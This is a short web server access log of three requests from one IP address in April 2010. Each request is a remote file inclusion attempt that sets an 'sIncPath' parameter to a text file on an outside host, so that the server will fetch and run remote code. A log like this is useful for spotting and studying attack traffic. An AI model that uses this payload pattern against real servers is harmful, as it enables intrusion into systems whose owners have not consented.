85.114.135.218 - - [19/Apr/2010:03:27:10 -0500] "GET /logs/?sIncPath=http://kucing11.fileave.com/id1.txt?? HTTP/1.1" 200 2329 "-""Mozilla/5.0"
85.114.135.218 - - [19/Apr/2010:03:27:10 -0500] "GET /?sIncPath=http://kucing11.fileave.com/id1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
85.114.135.218 - - [19/Apr/2010:03:27:19 -0500] "GET /logs/access_log.1219363200/?sIncPath=http://kucing11.fileave.com/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
